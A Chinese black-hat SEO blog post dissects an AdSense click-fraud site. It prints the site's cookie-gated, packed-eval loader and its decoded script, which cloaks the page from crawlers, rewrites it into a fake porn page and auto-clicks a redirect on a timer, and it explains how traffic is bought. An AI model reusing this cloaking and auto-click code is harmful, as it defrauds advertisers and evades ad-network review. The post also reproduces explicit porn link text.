推送过一些adsense的EMU,今天继续码一下

素材来源于内部QQ群,某人发了出来,大家疑惑入口点。

刚好回来,顺手看了下。简单分析。

目标站

www.affadsense.com(站长已经圈内联系,因此隐藏)

直接打开页面是正常的。

Adsense EMU

关键词 财经,外汇,期货。

这些都是相对CPC单价高的。

但是群内成员点开看的却是另一种页面:

Adsense EMU

尝试跟上次推送的EMU源码看看是不是一样

上次推送的EMU站点,触发EMU的入口是在list.php

然后打开是404

Adsense EMU

因此,我们不知道入口是哪里。手法操作猜测可能变了,因此有必要继续深入一下。

学习别人的思路,是我扒站的主要原因。我们继续看。

分析猫腻的地方

习惯性的查看下网页源码,看下有什么独特的地方。
Adsense EMU

这里发现了个地方,就是调用了ck.js在头部。

Adsense EMU

底部多了个调用的

show.js

我们看下ck.js的内容


var cookieString = new String(document.cookie); var cookieHeader = "ff66ww"; var beginPosition = cookieString.indexOf(cookieHeader); var bjj = "-1" ;//-1为不存在此cookie if (beginPosition == -1){ var cookieString2 = new String(document.cookie); var cookieHeader2 = "ffww"; var beginPosition2 = cookieString2.indexOf(cookieHeader2); var bjs; if (beginPosition2 != -1){ bjs="y"; eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('k["\\l\\m\\2\\e\\j\\5\\8\\0"]["\\i\\1\\6\\0\\5\\d\\8"]("\\g\\3\\2\\1\\6\\7\\0 \\d\\4\\8\\c\\e\\4\\c\\5\\9\\\'\\b\\4\\f\\4\\3\\2\\1\\6\\7\\0\\\' \\0\\n\\7\\5\\9\\\'\\0\\5\\o\\0\\a\\b\\4\\f\\4\\3\\2\\1\\6\\7\\0\\\' \\3\\1\\2\\9\\\'\\a\\i\\q\\p\\b\\3\\\'\\h\\g\\a\\3\\2\\1\\6\\7\\0\\h");',27,27,'x74|x72|x63|x73|x61|x65|x69|x70|x6e|x3d|x2f|x6a|x67|x6c|x75|x76|x3c|x3e|x77|x6d|window|x64|x6f|x79|x78|x2e|x7a'.split('|'),0,{})) }else{ bjj = "-1" ; } }else{ bjj = "1" ; }

介绍下代码的作用


var cookieString = new String(document.cookie); var cookieHeader = "ff66ww"; var beginPosition = cookieString.indexOf(cookieHeader);

判断cookie是否有ff66ww

同理

var cookieString2 = new String(document.cookie);
    var cookieHeader2 = "ffww"; 
    var beginPosition2 = cookieString2.indexOf(cookieHeader2);

判断cookie是否存在ffww


if (beginPosition2 != -1){ bjs="y"; eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('k["\\l\\m\\2\\e\\j\\5\\8\\0"]["\\i\\1\\6\\0\\5\\d\\8"]("\\g\\3\\2\\1\\6\\7\\0 \\d\\4\\8\\c\\e\\4\\c\\5\\9\\\'\\b\\4\\f\\4\\3\\2\\1\\6\\7\\0\\\' \\0\\n\\7\\5\\9\\\'\\0\\5\\o\\0\\a\\b\\4\\f\\4\\3\\2\\1\\6\\7\\0\\\' \\3\\1\\2\\9\\\'\\a\\i\\q\\p\\b\\3\\\'\\h\\g\\a\\3\\2\\1\\6\\7\\0\\h");',27,27,'x74|x72|x63|x73|x61|x65|x69|x70|x6e|x3d|x2f|x6a|x67|x6c|x75|x76|x3c|x3e|x77|x6d|window|x64|x6f|x79|x78|x2e|x7a'.split('|'),0,{})) }else{ bjj = "-1" ; } }else{ bjj = "1" ; }

如果存在cookie ffww,则触发


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('k["\\l\\m\\2\\e\\j\\5\\8\\0"]["\\i\\1\\6\\0\\5\\d\\8"]("\\g\\3\\2\\1\\6\\7\\0 \\d\\4\\8\\c\\e\\4\\c\\5\\9\\\'\\b\\4\\f\\4\\3\\2\\1\\6\\7\\0\\\' \\0\\n\\7\\5\\9\\\'\\0\\5\\o\\0\\a\\b\\4\\f\\4\\3\\2\\1\\6\\7\\0\\\' \\3\\1\\2\\9\\\'\\a\\i\\q\\p\\b\\3\\\'\\h\\g\\a\\3\\2\\1\\6\\7\\0\\h");',27,27,'x74|x72|x63|x73|x61|x65|x69|x70|x6e|x3d|x2f|x6a|x67|x6c|x75|x76|x3c|x3e|x77|x6d|window|x64|x6f|x79|x78|x2e|x7a'.split('|'),0,{}))

并设置bjs=1,否则bjj=-1。

具体就不说了,我们继续解密

eval(function(p,a,c,k,e,d)解密

我们直接把eval 换成 console.log 然后在chrome的浏览器的f12功能的console内运行即可。

代码即变成


console.log(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('k["\\l\\m\\2\\e\\j\\5\\8\\0"]["\\i\\1\\6\\0\\5\\d\\8"]("\\g\\3\\2\\1\\6\\7\\0 \\d\\4\\8\\c\\e\\4\\c\\5\\9\\\'\\b\\4\\f\\4\\3\\2\\1\\6\\7\\0\\\' \\0\\n\\7\\5\\9\\\'\\0\\5\\o\\0\\a\\b\\4\\f\\4\\3\\2\\1\\6\\7\\0\\\' \\3\\1\\2\\9\\\'\\a\\i\\q\\p\\b\\3\\\'\\h\\g\\a\\3\\2\\1\\6\\7\\0\\h");',27,27,'x74|x72|x63|x73|x61|x65|x69|x70|x6e|x3d|x2f|x6a|x67|x6c|x75|x76|x3c|x3e|x77|x6d|window|x64|x6f|x79|x78|x2e|x7a'.split('|'),0,{}))

执行结果:

Adsense EMU

得到以下结果:


window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\'\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\' \x74\x79\x70\x65\x3d\'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\' \x73\x72\x63\x3d\'\x2f\x77\x7a\x2e\x6a\x73\'\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");

解密如下


window["document"]["writeln"]("<script language=\'javascript\' type=\'text/javascript\' src=\'/wz.js\'></script>");

意思为继续调用wz.js

因此,我们继续深入wz.js即可。

wz.js的深入

我们直接打开wz.js 获取代码如下


document.writeln("<!DOCTYPE html PUBLIC \'-//W3C//DTD XHTML 1.0 Transitional//EN\' \'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\'>"); document.writeln("<html xmlns=\'http://www.w3.org/1999/xhtml\'><head lang=\'zh-cn\'><meta http-equiv=\'Content-Type\' content=\'text/html; charset=GBK\'>"); document.writeln("<meta http-equiv=\'Content-Language\' content=\'zh-cn\'>"); document.writeln("<title></title>"); document.writeln("<meta name=\'keywords\' content=\'\'>"); document.writeln("<meta name=\'description\' content=>"); document.writeln(" <meta name=\'viewport\' content=\'width=device-width, initial-scale=1.0\'>"); document.writeln(" <meta name=\'author\' content=\'\'>"); document.writeln("<style>#a1,#footer,#head,#listgjz,#logoa,#nr,#shou,#tou,#xg1,#xg2,#xg3,#xg4{display:none}.fenhang{display:none}#clear250{display:block;position:absolute;z-index:20;margin:0}"); document.writeln(""); document.writeln("#gd0{position:relative}#gda,#gdb,#gdc,#gdd{height:280px;width:336px;position:absolute;top:0;left:0;z-index:100}#gda .bg336,#gdb .bg336,#gdc .bg336,#gdd .bg336{filter:alpha"); document.writeln(""); document.writeln("(opacity=0);-moz-opacity:0;opacity:0}#gda .bg336,#gdb .bg336,#gdc .bg336,#gdd .bg336{position:absolute;left:0;top:0;z-index:999}</style><style>*{margin:0;padding:0}body"); document.writeln(""); document.writeln("{background:#FFFFFF;color:#333;font-family:\'微软雅黑\';font-size:12px}li{list-style:none}img{display:block;border:none}a{text-decoration:none;color:#222}a:hover{text-"); document.writeln(""); document.writeln("decoration:none;color:#C00}.clear{clear:both}.left{float:left;display:inline}.right{float:right;display:inline}.wrap{clear:both;width:980px;margin:0 auto}.navigation_each"); document.writeln(""); document.writeln("{height:40px;border-bottom:1px solid #FFF}.navigation_each a{float:left;display:inline;width:106px;height:40px;line-height:40px;background:#666;border-left:1px solid "); document.writeln(""); document.writeln("#999;color:#FFF;font-size:16px;text-align:center}.navigation_each a:hover{background:#000;color:#FFF}.navigation_each a.a1"); document.writeln(""); document.writeln("{width:124px;background:#1D7AD9;border:none}.navigation_each a.a1:hover{background:#A00}.footer{height:60px;line-height:60px;text-align:center}.location"); document.writeln(""); document.writeln("{clear:both;width:958px;height:35px;line-height:35px;margin:8px auto;padding-left:20px;background:#FFF;border:1px solid #DDD}</style>"); document.writeln("<style> "); document.writeln(".div-a{ float:left;width:49%;border:1px solid #000}"); document.writeln(".div-b{ float:left;border:0px solid #000}"); document.writeln("</style>"); document.writeln(" <style>"); document.writeln(" #gdc {position: absolute;left:400;top:-840px; }"); document.writeln(" #gdd {position: absolute;left:800px;top:-410px;}"); document.writeln(" #gda {position: absolute;left:410px;top:-840px; }"); document.writeln(" #gdb {position: absolute;left:750px;top:-890px;}"); document.writeln(" </style>"); document.writeln("<script type=\'text/javascript\'>"); document.writeln("function GetRandomNum(Min,Max)"); document.writeln("{ "); document.writeln("var Range = Max - Min; "); document.writeln("var Rand = Math.random(); "); document.writeln("return(Min + Math.round(Rand * Range)); "); document.writeln("} "); document.writeln("var mytime = GetRandomNum(20000,30000); "); document.writeln("function myclick()"); document.writeln("{"); document.writeln("document.getElementById(\'clickMe\').click();"); document.writeln("}"); document.writeln("function autoclick(){"); document.writeln("setTimeout(\'myclick()\',mytime);"); document.writeln("}"); document.writeln("</script>"); document.writeln("</head><body onload=\'autoclick()\'><div class=\'navigation wrap\'>"); document.writeln(" <div class=\'navigation_each\'>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' id=\'clickMe\' class=\'a1\'>电影专区</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>亚洲色情</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>欧美性爱</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>女同性恋</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>乱伦虐待</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>制服丝袜</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>经典有码</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>经典三级</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>偷拍自拍</a>"); document.writeln(" </div>"); document.writeln(" <div class=\'navigation_each\'>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\' class=\'a1\'>激情图区</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>亚洲色图</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>欧美色图</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>偷拍自拍</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>清纯唯美</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>动漫图片</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>美腿丝袜</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>乱伦图区</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>另类图片</a>"); document.writeln(" </div>"); document.writeln(" <div class=\'navigation_each\'>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\' class=\'a1\'>情色小说</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>激情小说</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>校园春色</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>淫色人妻</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>黄色笑话</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>性爱技巧</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>意淫强奸</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>武侠古典</a>"); document.writeln("<a href=\'/wp-content/themes/shop-and-commerce/301.php\' target=\'_blank\'>乱伦文学</a>"); document.writeln(" </div>"); document.writeln("</div>"); document.writeln("<div class=\'location\'>您的位置:> 性吧首页 > 电影专区 > 正在播放中</div>"); document.writeln("<div class=\'wrap\'>"); document.writeln("<div style=\'padding-left: 20px;padding-right: 20px;background:#FFFCF7\'>"); document.writeln("<div class=\'n_bd\'>"); document.writeln("<p><font color=\'#0000FF\' style=\'font-size:15px;\'>"); document.writeln("【时间长度】:32:18</br>【影片尺度】: 无码 "); document.writeln("</br>"); document.writeln("</br>"); document.writeln("<script src=\'/ad/728.js\'></script>"); document.writeln("<script src=\'/ad/729.js\'></script>"); document.writeln("</br>"); document.writeln("<font color=\'red\' size=\'+1\'>热心提示:</br>点击广告链接后系统检测到即可自动播放,弹出的网页必须停留30秒以上方可关闭,关闭后播放启动</font>"); document.writeln("</font></p>"); document.writeln("<div style=\'padding:20px 0 0 0; margin:0;\' id=\'tua\'> "); document.writeln("<div class=\'div-a\'><script>document.write(\'<img src=/tp/\'+Math.round(Math.random()*21+1)+\'.gif width=100% height=100%>\');</script>"); document.writeln("</div><div class=\'div-b\'><script src=\'/ad/250.js\'></script></div>"); document.writeln("</div>"); document.writeln("</div>"); document.writeln("<div class=\'clear\'></div>"); document.writeln("<div class=\'footer\'>站点申明:我们立足于美利坚合众国,对全球华人服务,受北美法律保护。Copyright © 2013-2017版权所</div>"); document.writeln("<script type=\'text/javascript\' src=\'/ad/tj.js\'></script>"); document.writeln("</body></html>");

<script src=\'/ad/728.js\'></script>这类的代码为挂入的adsense代码

Adsense EMU
以上代码意思为随机时间,触发myclick方法,myclick的方法则是网页元素ID为clickMe进行点击

相对点击为以下截图

Adsense EMU

路径为http://www.affadsense.com/wp-content/themes/shop-and-commerce/301.php

因此,触发也猜测类似这个功能

我们直接打开

跳转到页面,触发了。

Adsense EMU

这个Google Adsense EMU 作弊的特点

我们查看下源码

Adsense EMU

即源码查看,蜘蛛爬行是正常页面,

然后通过多个js调用,然后用document.writeln来重新写入页面内容。

另外JS中,对内容进行unicode编码加密。

Adsense EMU

这类的

&#后面跟的是unicode字符的十进制值

解码的话,可以用python的库

 import HTMLParser
 s = '【试呼】'
 h = HTMLParser.HTMLParser()
 print h.unescape(s)

来解码。

对敏感字符的unicode编码,老农这里猜测也是为了躲避adsense的蜘蛛爬行审查。

我们来看下流量

Adsense EMU

2-3月份开始这个站长开始这种操作。

流量以中文流量为主。

Adsense EMU

通过SIMILARWEB查看,有个display ads有统计一点,

流量以exoClick为主,因此猜测,通过购买流量商的流量,然后进入类似

wp-content/themes/shop-and-commerce/301.php 这样的入口,植入cookie,然后通过js判断cookie再document.writeln 达到adsense的诱惑页面触发点击。

就到这里了

貌似每次都有忙的借口,这次有开始新的团队,筹备自己的黑帽管理平台

image

然后又要陪老爸跑跑装修市场,看看材料,这块真的挺头大,跟大佬说的一样。

买便宜的又怕质量不行,买贵的又怕有猫腻被别人吭。

image

码字不易,您的转发和赞赏是我的一大动力之一。

欢迎关注我的公众号,请爱护我,不要抄袭我。

image

欢迎加入我的论坛,与我们一起交流。

下面是加入小密圈/获取论坛邀请码购买渠道:

小密圈(入圈后私信圈主,看到会私信邀请码):

image

其他获取方式:

支付宝:image

微信支付:

image